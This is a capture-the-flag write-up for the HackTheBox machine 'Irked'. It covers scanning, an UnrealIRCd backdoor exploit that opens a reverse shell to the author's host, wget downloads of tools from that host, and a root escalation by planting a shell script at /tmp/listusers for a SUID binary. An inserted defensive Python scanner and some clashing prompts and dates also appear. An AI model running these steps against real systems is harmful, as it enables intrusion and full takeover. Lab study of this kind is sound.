HackTheBox | Irked

Initial TCP Nmap Scan

Nmap scan report for 10.10.10.117
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36530/tcp   status
|   100024  1          45094/tcp6  status
|   100024  1          50161/udp6  status
|_  100024  1          50210/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Full TCP Nmap Scan

Nmap scan report for 10.10.10.117
Host is up (0.076s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36530/tcp   status
|   100024  1          45094/tcp6  status
|   100024  1          50161/udp6  status
|_  100024  1          50210/udp   status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
36530/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Initial Thoughts Based On Nmap Scans

Based on the Nmap scans, I am going to walk through my thoughts on the ports I see, top to bottom.

22 - SSH: this is usually a port I deal with once I have some sort of username or credentials to log in with. I also quickly check whether the version is out of date, since that may make SSH itself vulnerable, but more likely than not it will just be the vector I use once I have credentials or a username to brute force. OpenSSH 6.7p1 "deb8u4" is old and also tells me the box is running Debian 8.

80 - HTTP: HTTP is a beast on its own. I start small: look at the site, read the page source for anything interesting, brute force directories to discover content the site does not link to, and try to identify version numbers I can Google for an exploit against that particular service and version.

111 - rpcbind: the portmapper maps ONC RPC program numbers to the ports their services listen on. You can probe it (rpcinfo does this) to enumerate the registered services; here that is only rpcbind itself and rpc.statd, which is what the high port 36530 (RPC program 100024, "status") is. This will most likely be the last port I look at, as the exploit path is fairly niche in my experience so far.

6697, 8067, 65534 - IRC: all three are UnrealIRCd, an Internet Relay Chat server, essentially a text-based chat system that anyone can host. For this I will most likely just be Googling for known exploits for "UnrealIRCd". Nmap's service info also gives away the hostname irked.htb.

With my thoughts expressed, let's start this box!

HTTP - 80 | Enumeration

First I navigate to http://10.10.10.117. There is nothing interesting there besides a picture, so I run a gobuster scan against the web application.

gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Doing this did not yield anything useful. Since no directories were found, I tried adding some file extensions to the gobuster scan as well, with no luck.

gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.pdf

I checked the page source as well; nothing was there except the path to the image, http://10.10.10.117/irked.jpg. With not much to go on, I left HTTP on the back burner for now.

IRC - 6697/8067/65534 | Enumeration

The first thing I did when seeing this was a simple searchsploit search. searchsploit is a tool that searches a local copy of the Exploit Database, so it works offline and is quick to check against a service name.

searchsploit UnrealIRC
root@kali~searchsploit UnrealIRC
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                                        | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                                             | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                                      | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                           | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I see one that mentions "Backdoor Command Execution", which sounds pretty intriguing. As I am prepping for the OSCP exam, where Metasploit use is limited, I Googled for a standalone version of this exploit and found a Python one on GitHub. I go ahead and clone it onto my box.

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git

Low Privilege Shell

Running the script with no arguments shows which arguments it needs to run properly.

python3 exploit.py
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py                                
usage: exploit.py [-h] -payload {python,netcat,bash} ip port
exploit.py: error: the following arguments are required: ip, port, -payload

So I need the target IP address, the port number, and -payload with one of python, netcat or bash. I am going to use bash. Before I run it, I also need to change the local_ip and local_port variables inside the script to my own IP and the port I will be listening on. I chose 443 as the port I will be listening on.

vim exploit.py
# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.36'  # CHANGE THIS
local_port = '443'  # CHANGE THIS 

I went ahead and saved the file. Now I can set up my Netcat listener on port 443.

nc -lvnp 443

With my Netcat listener set up, I can run the exploit:

python3 exploit.py 10.10.10.117 6697 -payload bash
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py 10.10.10.117 6697 -payload bash
Exploit sent successfully!

Looking back at my Netcat listener, I got a connection!

root@kali-[~]nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.117] 37515
bash: cannot set terminal process group (639): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ whoami && id
whoami && id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Privilege Escalation

Now that we have a low privileged shell, I am going to look for ways to escalate my privileges to root. A good thing to always run when you get a low privileged shell is linPEAS or winPEAS, depending on the operating system. This is a Linux box, so I will be running linPEAS. If you do not already have it, grab linpeas.sh from the PEASS-ng GitHub repository and save it on your host under that name. After that, host a simple Python HTTP server by running the following command (make sure you run it from the directory that contains your linpeas.sh file):

python -m SimpleHTTPServer 80

Hosting the Python HTTP server lets the low privileged shell pull the file from my host. Typically I would use curl, which transfers data to or from a server over HTTP, FTP, IMAP and many other protocols, but this box does not have curl. Thankfully there is wget, a utility for non-interactive download of files from the web, so I use that to download the file from my host onto the box.

wget http://10.10.14.36/linpeas.sh
ircd@irked:~/Unreal3.2$ wget http://10.10.14.36/linpeas.sh
wget http://10.10.14.36/linpeas.sh
--2021-06-07 19:09:37--  http://10.10.14.36/linpeas.sh
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘linpeas.sh’

     0K .......... .......... .......... .......... .......... 14%  324K 1s
    50K .......... .......... .......... .......... .......... 29%  654K 1s
   100K .......... .......... .......... .......... .......... 44% 4.35M 0s
   150K .......... .......... .......... .......... .......... 59%  758K 0s
   200K .......... .......... .......... .......... .......... 74% 3.90M 0s
   250K .......... .......... .......... .......... .......... 89% 2.66M 0s
   300K .......... .......... .......... ...                  100% 2.18M=0.4s

2021-06-07 19:09:37 (943 KB/s) - ‘linpeas.sh’ saved [341863/341863]

Now that it is saved onto the box with the low privileged shell, I have to make sure the file is executable by running chmod +x.

chmod +x linpeas.sh

Now run it.

./linpeas.sh

This produces a lot of output. What caught my eye in the "Interesting Files" section was an "Unknown SUID binary" at /usr/bin/viewuser. SUID is short for Set User ID, a permission bit that makes a file execute with the effective user ID of its owner rather than of the user running it; here the owner is root. linPEAS tags it as "Unknown" simply because it is not one of the standard setuid binaries it recognises, which makes it a custom addition and worth a closer look. As the user we are right now (ircd), we can run this file.

════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found                                                                           
-rwsr-sr-x 1 root   root       9.3K Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root   root        95K Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon      50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root   root        14K Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root   root        26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root   root        34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root   dip        332K Apr 14  2015 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root   root        34K Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root   root        14K Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root   root        18K Sep  8  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-- 1 root   messagebus 355K Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root   root       158K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root   root       9.3K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root   root        77K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root   root        43K May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root   root        38K May 17  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root   root        38K May 17  2017 /bin/su
-rwsr-sr-x 1 root   mail        94K Nov 18  2017 /usr/bin/procmail                
-rwsr-xr-x 1 root   root       550K Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root       1.1M Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root   root       7.2K May 16  2018 /usr/bin/viewuser (Unknown SUID binary)

I go ahead and test what it does by just running it:

djmardov@irked:/tmp$ /usr/bin/viewuser       
This application is being devleoped to set and test user permissions
It is still being actively developed                                                                                                                                                  
(unknown) :0           2021-06-07 09:01 (:0)                                                                                                                                          
djmardov pts/0        2021-06-07 15:38 (10.10.14.36)                                                                                                                                  
sh: 1: /tmp/listusers: not found

It prints a who-style list of logged-in users and then complains at the bottom that /tmp/listusers was not found. Interesting. The "sh: 1:" prefix on that error tells me the binary hands the path to sh (a system() call), and the path is absolute, under /tmp, a directory every user can write to. A quick strings /usr/bin/viewuser is a good way to confirm the hard-coded path before relying on it. Since viewuser runs with root privileges, whatever it executes from that path runs as root too. So all we need to do is create a listusers file in /tmp with content that spawns a shell. This is really simple, so let's do it. First, I cd into /tmp:
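To turn this finding into a reusable check, here is an added example (my own code, not from the writeup, the box or linPEAS): a small Python scanner that extracts printable strings from setuid-root binaries the way strings(1) does and flags any hard-coded path under a world-writable directory (/tmp, /var/tmp, /dev/shm). The FAKE_VIEWUSER blob is a constructed stand-in for the real binary that carries only the strings the page shows, so the example runs offline; the filesystem walk only does anything useful on a real target.

```python
import os
import re
import stat

# Printable ASCII runs of 4+ bytes, the same heuristic strings(1) uses by default.
_STRINGS_RE = re.compile(rb"[\x20-\x7e]{4,}")

# A path token under a directory any local user can write to. Longer prefixes are listed
# first only for readability; re scans left to right, so "/var/tmp/x" is reported whole.
_WRITABLE_REF_RE = re.compile(r"(?:/var/tmp|/dev/shm|/tmp)/[^\s'\"]*")


def extract_strings(data: bytes):
    """All printable strings of at least four characters in a binary image."""
    return [m.group().decode("ascii") for m in _STRINGS_RE.finditer(data)]


def writable_path_refs(data: bytes):
    """Paths under world-writable directories that appear as strings in the image.
    A privileged binary that executes such a path hands control to whoever creates
    that file first, which is exactly the /tmp/listusers bug in viewuser."""
    refs = []
    for s in extract_strings(data):
        refs.extend(_WRITABLE_REF_RE.findall(s))
    return refs


def is_setuid_root(path: str) -> bool:
    """True for a file owned by uid 0 with the setuid bit set."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def scan_suid_binaries(roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/lib")):
    """Walk the given roots and return {path: [suspicious refs]} for setuid-root files."""
    findings = {}
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    if not is_setuid_root(full):
                        continue
                    with open(full, "rb") as fh:
                        refs = writable_path_refs(fh.read())
                except OSError:
                    continue          # unreadable or vanished; not a finding
                if refs:
                    findings[full] = refs
    return findings


# Constructed stand-in for /usr/bin/viewuser: an ELF-looking blob holding the strings
# the real binary printed on the page plus the path it tried to execute.
FAKE_VIEWUSER = (
    b"\x7fELF" + b"\x00" * 12
    + b"This application is being devleoped to set and test user permissions\x00"
    + b"/tmp/listusers\x00who\x00/bin/sh\x00"
)


if __name__ == "__main__":
    print("stand-in binary:", writable_path_refs(FAKE_VIEWUSER))
    for path, refs in scan_suid_binaries().items():
        print(path, refs)
```

Run it as an unprivileged user on a target; any hit deserves the same treatment as viewuser, and the same fix applies on the defensive side: privileged code should execute only from root-owned, non-writable locations.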

cd /tmp

Now I go back onto my host and create a file named listusers using a text editor like vim, nano, etc. Doesn’t really matter as long as you can write into the file. I go ahead and put the following into the file:

#!/bin/bash

bash

The #!/bin/bash line is known as a "shebang": it tells the kernel to run the file with /bin/bash as its interpreter. The only command after it is bash, which spawns an interactive bash shell. So all this does is pick /bin/bash as the interpreter and then start another bash. One caveat worth knowing: bash drops an effective uid of 0 back to the real uid unless it is started with -p, so if a SUID binary had only raised the effective uid you would want bash -p here. viewuser sets the real uid as well (the id output later shows uid=0), so plain bash is enough. I saved the file and started another Python HTTP server to transfer it from my host to the low privileged shell.

python -m SimpleHTTPServer 80

Now on the low privileged shell, I download the file from my host

wget http://10.10.14.36/listusers
ircd@irked:/tmp$ wget http://10.10.14.36/listusers
wget http://10.10.14.36/listusers
--2021-06-07 19:19:20--  http://10.10.14.36/listusers
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18 [application/octet-stream]
Saving to: ‘listusers’

     0K                                                       100% 3.86M=0s

2021-06-07 19:19:20 (3.86 MB/s) - ‘listusers’ saved [18/18]

Now that the file is in /tmp, I make sure it is executable (wget does not set the execute bit, so run chmod +x /tmp/listusers if needed; otherwise sh reports "Permission denied" instead of running it) and run the SUID binary again.

/usr/bin/viewuser
ircd@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2021-07-07 09:01 (:0)
djmardov pts/0        2021-07-07 15:38 (10.10.14.36)
whoami && id
root
uid=0(root) gid=1001(ircd) groups=1001(ircd)

And I am now the root user! Note that the uid is 0 while the gid is still 1001 (ircd): viewuser only raised the user ID, but uid 0 is all that matters.